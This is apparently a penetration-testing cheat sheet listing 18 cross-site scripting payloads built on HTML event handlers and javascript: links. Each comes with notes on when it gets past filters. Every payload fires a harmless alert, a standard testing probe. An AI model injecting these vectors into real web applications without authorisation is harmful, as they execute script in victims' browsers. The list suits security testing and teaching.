# XSS Event Handler Payloads

----------------------------------------
1. Image Error
Payload: <img src=x onerror=alert(1)>
Description: Executes when image fails to load.
Use Case: Works when <script> tags are filtered but HTML is allowed.

----------------------------------------
2. Image Error (String)
Payload: <img src=x onerror=alert('XSS')>
Description: Same as above with string output.
Use Case: Used for testing reflected XSS with visible output.

----------------------------------------
3. Attribute Injection
Payload: <img src=1 href=1 onerror="javascript:alert(1)">
Description: Injects JavaScript via attribute manipulation.
Use Case: Useful when multiple attributes are allowed in input.

----------------------------------------
4. SVG Onload
Payload: <svg/onload=alert(1)>
Description: Executes inside SVG element.
Use Case: Bypasses filters blocking <script> but allowing SVG.

----------------------------------------
5. Body Onload
Payload: <body onload=alert(1)>
Description: Runs when page loads.
Use Case: Effective in full HTML injection scenarios.

----------------------------------------
6. Iframe Onload
Payload: <iframe onload=alert(1)></iframe>
Description: Executes when iframe loads.
Use Case: Useful when iframe tags are permitted.

----------------------------------------
7. Input Focus
Payload: <input type="text" onfocus="alert(1)" autofocus>
Description: Triggers automatically on focus.
Use Case: Useful when interaction is limited (auto-trigger).

----------------------------------------
8. Input Blur
Payload: <input onblur=alert(1) autofocus>
Description: Executes when input loses focus.
Use Case: Works in forms where user interaction exists.

----------------------------------------
9. Select Change
Payload: <select onchange=alert(1)><option>1</option><option>2</option></select>
Description: Runs when selection changes.
Use Case: Used in dropdown-based inputs.

----------------------------------------
10. Textarea Input
Payload: <textarea oninput=alert(1)></textarea>
Description: Executes when user types.
Use Case: Useful in comment or input fields.

----------------------------------------
11. Form Submit
Payload: <form onsubmit=alert(1)><button>Submit</button></form>
Description: Runs on form submission.
Use Case: Useful in login or registration forms.

----------------------------------------
12. JavaScript Link
Payload: <a href="javascript:alert(1)">Click me</a>
Description: Executes when link is clicked.
Use Case: Works when user clicks links.

----------------------------------------
13. Mouse Hover
Payload: <a onmouseover=alert(1)>Hover me</a>
Description: Triggers on mouse hover.
Use Case: Social engineering without clicking.

----------------------------------------
14. Button Click
Payload: <button onclick=alert(1)>Click me</button>
Description: Executes on button click.
Use Case: Used in interactive UI elements.

----------------------------------------
15. Details Toggle
Payload: <details ontoggle=alert(1)>Toggle me</details>
Description: Runs when element is toggled.
Use Case: Less common vector, bypasses basic filters.

----------------------------------------
16. Video Error
Payload: <video src=x onerror=alert(1)></video>
Description: Executes when video fails to load.
Use Case: Works when media tags are allowed.

----------------------------------------
17. Audio Error
Payload: <audio src=x onerror=alert(1)></audio>
Description: Executes when audio fails.
Use Case: Similar to video, alternative media vector.

----------------------------------------
18. CSS Animation Event
Payload: <style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
Description: Triggers via CSS animation event.
Use Case: Advanced bypass when script/event filters exist.

----------------------------------------